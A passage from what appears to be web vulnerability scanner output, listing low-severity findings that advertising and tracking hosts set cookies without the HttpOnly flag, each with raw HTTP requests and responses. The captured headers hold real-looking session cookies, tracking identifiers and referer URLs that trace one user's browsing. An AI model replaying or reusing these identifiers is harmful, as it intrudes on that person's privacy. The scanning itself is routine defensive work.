Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=83141D1BF679315B3A6FE0130C26720B; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:58:09 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c73ae63744334ae8cef4967d1912276c4668924ff5e00a6078cb239e3f1b573242cbd9b707a451092fc680a56b548caeb5a3f96f49b427787e772f8662a4191929dc9447c4758dd37c9d02690b0b; Expires=Sat, 31-Dec-2011 23:58:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e93200beff43; Path=/
Set-Cookie: _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a00d8b959; Expires=Sat, 31-Dec-2011 23:58:10 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 45071


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

14.180. http://pixel.rubiconproject.com/di.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /di.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /di.php?v=2372||2373|0||3810||2374||&r=3761|0,3169,3578,3577,2110,2195,2196,2197,2579,2198,4134,3734,2199,2364,2362,2363,2200,3810,2111,2494,2201,3513,2202,2496,2202,2496,2203,2204,2189,2112,2497,2205,2355,2495,5838,3811,3512,2109,3812,2239,2190,2206,2113,2206,2113,4552,2765,6184,2240,4105,4193,2372,2373,2374,2375, HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; rpx=4940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C694%2C3%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C552%2C14%2C%2C%265671%3D14742%2C608%2C2%2C%2C%264212%3D14742%2C154%2C2%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C608%2C2%2C%2C%267727%3D14742%2C553%2C3%2C%2C%265852%3D14742%2C488%2C2%2C%2C%266286%3D14843%2C141%2C2%2C%2C%266643%3D14894%2C0%2C1%2C%2C%264554%3D15350%2C0%2C1%2C%2C; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; lm="2 Oct 2011 23:50:10 GMT"; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462; csi2=3188003.js^2^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; csi15=3226249.js^3^1317599341^1317599886&3188004.js^2^1317599406^1317599881&2748761.js^1^1317599431^1317599431&3209195.js^2^1317595891^1317598688; ses1=13209^5; csi1=3226243.js^1^1317599890^1317599890&3226929.js^2^1317599456^1317599882&3226251.js^2^1317599333^1317599350; ses9=12359^1; csi9=3154654.js^1^1317599933^1317599933; ses2=13378^2&12566^2&12359^1; rdk=7743/12359; ses15=13378^2&13209^3&12566^2&12359^2; cd=false; khaos=GT3FYRAA-6-CO8F

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:01:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1%262372%3D1%263810%3D1%262374%3D1; expires=Sat, 31-Mar-2012 00:01:11 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

14.181. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=6432&rnd1317601647 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.igougo.com%2Ftraveldeals%2Fratefinder.aspx%3FTypeID%3D1%26SourceID%3DTVLY-dRF-Popunder%26adlt%3D1%26end%3DBoston%26rm%3D1%26dest%3DBoston%2C%2520undefined%2520undefined%26strtDate%3D10%2F04%2F2011%26endDate%3D10%2F07%2F2011&jsref=http%3A%2F%2Fwww.travelocity.com%2FpopWindow2%3FtheDomain%3Dwww.travelocity.com%26selectedForm%3Dcb-form-ho%26formPrefix%3DHO%26fromDate%3Ddd%26fromMonth%3Dmm%26fromYear%3Dyyyy%26toDate%3Ddd%26toMonth%3Dmm%26toYear%3Dyyyy%26theAdtoShow%3Dad2%26dest%3DBOS%26triptype%3D%26noOfRooms%3D1%26noOfAdults%3D1%26service%3DTRAVELOCITY%26oneway%3D&rnd=1317601643778
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpx=4940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C694%2C3%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C552%2C14%2C%2C%265671%3D14742%2C608%2C2%2C%2C%264212%3D14742%2C154%2C2%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C608%2C2%2C%2C%267727%3D14742%2C553%2C3%2C%2C%265852%3D14742%2C488%2C2%2C%2C%266286%3D14843%2C141%2C2%2C%2C%266643%3D14894%2C0%2C1%2C%2C%264554%3D15350%2C0%2C1%2C%2C; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; lm="2 Oct 2011 23:50:10 GMT"; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462; csi2=3188003.js^2^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; csi15=3226249.js^3^1317599341^1317599886&3188004.js^2^1317599406^1317599881&2748761.js^1^1317599431^1317599431&3209195.js^2^1317595891^1317598688; ses1=13209^5; csi1=3226243.js^1^1317599890^1317599890&3226929.js^2^1317599456^1317599882&3226251.js^2^1317599333^1317599350; ses9=12359^1; csi9=3154654.js^1^1317599933^1317599933; ses2=13378^2&12566^2&12359^1; ses15=13378^2&13209^3&12566^2&12359^2; cd=false; khaos=GT3FYRAA-6-CO8F; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1%262372%3D1%263810%3D1%262374%3D1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:27:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1%262372%3D1%263810%3D1%262374%3D1%266432%3D1; expires=Wed, 02-Nov-2011 00:27:30 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=4940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C694%2C3%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C612%2C16%2C%2C%265671%3D14742%2C608%2C2%2C%2C%264212%3D14742%2C154%2C2%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C608%2C2%2C%2C%267727%3D14742%2C553%2C3%2C%2C%265852%3D14742%2C488%2C2%2C%2C%266286%3D14843%2C141%2C2%2C%2C%266643%3D14894%2C0%2C1%2C%2C%264554%3D15350%2C0%2C1%2C%2C%262372%3D15352%2C0%2C1%2C%2C%263810%3D15352%2C0%2C1%2C%2C%262374%3D15352%2C0%2C1%2C%2C; expires=Wed, 02-Nov-2011 00:27:30 GMT; path=/; domain=.pixel.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

14.182. http://psa-d.openx.com/w/1.0/ajs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://psa-d.openx.com
Path:   /w/1.0/ajs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /w/1.0/ajs?auid=34591&res=1920x1200x16&plg=swf,sl,qt,wmp,shk&ch=ISO-8859-1&tz=300&r=http%3A//ad.yieldmanager.com/clk%3F3%2CeAGlTl2LgzAQ.DW-SUiMn8g9xEsLXhu5glzxXkSTeBZbY6OH4q-.cJb-gS7L7swwOyzCcRVFTeVC3.fcpsY1jhF2eABF5MHQhnEcOzjwfCeAjj2miSAUwZQkh8P9RP6LRvSwITNpSE7Fxj5DAmYKgKs0mzfpzkL4tL4EEoWS9JFg9s8G2ccuW9Y0eUbTDmVre8lW7h7PX12W7yaW76.sHXrZyuZjzt3vXHTsXKAi52vx-NPcv9l2O02DhYnl7E0LMOlKyAWoQfYL4OpmxKrRYGiNaa9lo-XYWpi60HL8VfXyIgzzPYQM57XBl36Ueip11Qt1K.vfWy112UotjeGquHH8AXalc1A%3D%2C&url=http%3A//ad.yieldmanager.com/iframe3%3FsIBdAD10IABKKqQAAAAAAD9DKAAAAAAAAAD8AQYAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAW.30Nu93RCtBfFrLYyCes0SaSDuDUXyk5fgvQAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fd.tradex.openx.com%252Fafr.php%253Frefresh%253D40%2526zoneid%253D6511%2526cb%253Dinsert_random_number_here%2526loc%253D%2CB%253D10%2526Z%253D728x90%2526_salt%253D3414706147%2526r%253D0%2526s%253D2126909%2C9578b778-ed51-11e0-9730-78e7d1f5a73c%2C1317599547696&ref=http%3A//ad.yieldmanager.com/st%3Fad_type%3Diframe%26ad_size%3D728x90%26section%3D2126909&cb=54908222960 HTTP/1.1
Host: psa-d.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.yieldmanager.com/iframe3?sIBdAD10IABKKqQAAAAAAD9DKAAAAAAAAAD8AQYAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAW.30Nu93RCtBfFrLYyCes0SaSDuDUXyk5fgvQAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6511%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D728x90%26_salt%3D3414706147%26r%3D0%26s%3D2126909,9578b778-ed51-11e0-9730-78e7d1f5a73c,1317599547696
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1745582797-1317599446738; OX_u=6f439ee2-7963-03ad-3e7a-e5d68608f547_m

Response

HTTP/1.1 200 OK
Set-Cookie: OX_u=6f439ee2-7963-03ad-3e7a-e5d68608f547_m; Version=1; Expires=Mon, 01 Oct 2012 23:52:28 GMT; Max-Age=31536000; Path=/
Server: MochiWeb/1.1 WebMachine/1.8.1 (participate in the frantic)
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Date: Sun, 02 Oct 2011 23:52:28 GMT
Content-Type: text/javascript
Content-Length: 1969
Cache-Control: private, max-age=0, no-cache
Connection: close


(function(){
document.write("<a href='http://psa-d.openx.com/w/1.0/rc?ts=0c2lkPTU0MTl8YXVpZD0zNDU5MXxhaWQ9NTc0ODd8cHViPTg3Mjd8bGlkPTQwMTc3fHQ9MXxyPWh0dHA6Ly9hZC55aWVsZG1hbmFnZXIuY29tL2Nsaz8zLGVBR2xUb
...[SNIP]...

14.183. http://r.openx.net/set

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /set

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set?pid=25afcb2d-854d-efb2-7940-1323bbd101a7&rtb=f9bdca69-e609-4297-9145-48ea56a0756c HTTP/1.1
Host: r.openx.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE&loc=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=ba6bf0b1-8895-45a9-97a1-53f788c412d7; i=d2a43928-76cd-49ea-b899-b41fb371435f; p=1317599506

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:48 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=d2a43928-76cd-49ea-b899-b41fb371435f; expires=Tue, 01-Oct-2013 23:51:48 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.184. http://r.turn.com/r/beacon

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/beacon?b2=ZkSA7I0AZ4MffR9fYJOaS7OUxk4yIsAo0Hjd6QMr-OTL4k0mREyxv90izWMmaVqB6KZp_AsihChRf9hcbm1UDQ&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/results.jsp?searchTokenId=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; rrs=1006%7C1003%7C1002%7C4%7C5%7C9%7C6%7C3; rds=15231%7C15228%7C15249%7C15235%7C15250%7C15228%7C15231%7C15248; rv=1; uid=2944787775510337379

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2944787775510337379; Domain=.turn.com; Expires=Sat, 31-Mar-2012 00:41:27 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 03 Oct 2011 00:41:26 GMT

GIF89a.............!.......,...........D..;

14.185. http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/cms/id/0/ddc/1/pid/43/uid/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/cms/id/0/ddc/1/pid/43/uid/?xid=u02DzKG_.KFBo5S2yyqljPCE HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://cdn.turn.com/server/ddc.htm?uid=2944787775510337379&mktid=&mpid=&fpid=5&rnd=2692888823581473023&nu=n&sp=y&ctid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; uid=2944787775510337379; rrs=1006%7C1003%7C1002%7C4%7C5%7C9%7C6%7C3; rds=15231%7C15228%7C15249%7C15235%7C15250%7C15228%7C15231%7C15248; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=2944787775510337379; Domain=.turn.com; Expires=Fri, 30-Mar-2012 23:53:08 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 02 Oct 2011 23:53:08 GMT

GIF89a.............!.......,...........D..;

14.186. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC85/rnd/xuPpW

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/du/id/L21rdC8xL21jaHBpZC85/rnd/xuPpW

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/du/id/L21rdC8xL21jaHBpZC85/rnd/xuPpW HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; rrs=1006%7C1003%7C3%7C4%7C1004%7C9%7C6; rds=15231%7C15228%7C15248%7C15235%7C15228%7C15228%7C15231; rv=1; uid=2944787775510337379

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2944787775510337379; Domain=.turn.com; Expires=Fri, 30-Mar-2012 23:49:37 GMT; Path=/
Set-Cookie: rrs=1006%7C1003%7C1002%7C4%7C1004%7C9%7C6%7C3; Domain=.turn.com; Expires=Fri, 30-Mar-2012 23:49:37 GMT; Path=/
Set-Cookie: rds=15231%7C15228%7C15249%7C15235%7C15249%7C15228%7C15231%7C15248; Domain=.turn.com; Expires=Fri, 30-Mar-2012 23:49:37 GMT; Path=/
Location: http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2944787775510337379/mchpid/9/url/
Date: Sun, 02 Oct 2011 23:49:37 GMT
Content-Length: 225

<html><body><p>Redirecting to <a href="http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2944787775510337379/mchpid/9/url/">http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2944787775510337379/mchpid/9/u
...[SNIP]...

14.187. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8z/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/du/id/L21rdC8xL21jaHBpZC8z/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/du/id/L21rdC8xL21jaHBpZC8z/ HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=26620&s=26621
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; rrs=1006%7C1003%7C1002%7C4%7C5%7C9%7C6%7C3; rds=15231%7C15228%7C15249%7C15235%7C15250%7C15228%7C15231%7C15248; rv=1; uid=2944787775510337379

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2944787775510337379; Domain=.turn.com; Expires=Sat, 31-Mar-2012 01:52:55 GMT; Path=/
Set-Cookie: rrs=1006%7C1003%7C5%7C1002%7C4%7C1004%7C9%7C6%7C3; Domain=.turn.com; Expires=Sat, 31-Mar-2012 01:52:55 GMT; Path=/
Set-Cookie: rds=15231%7C15228%7C15250%7C15249%7C15235%7C15250%7C15228%7C15231%7C15248; Domain=.turn.com; Expires=Sat, 31-Mar-2012 01:52:55 GMT; Path=/
Location: http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2944787775510337379/mchpid/3/url/
Date: Mon, 03 Oct 2011 01:52:55 GMT
Content-Length: 225

<html><body><p>Redirecting to <a href="http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2944787775510337379/mchpid/3/url/">http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2944787775510337379/mchpid/3/u
...[SNIP]...

14.188. http://r1-ads.ace.advertising.com/site=793631/size=160600/u=2/bnum=63830787/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=793631/size=160600/u=2/bnum=63830787/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the response's Set-Cookie headers below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

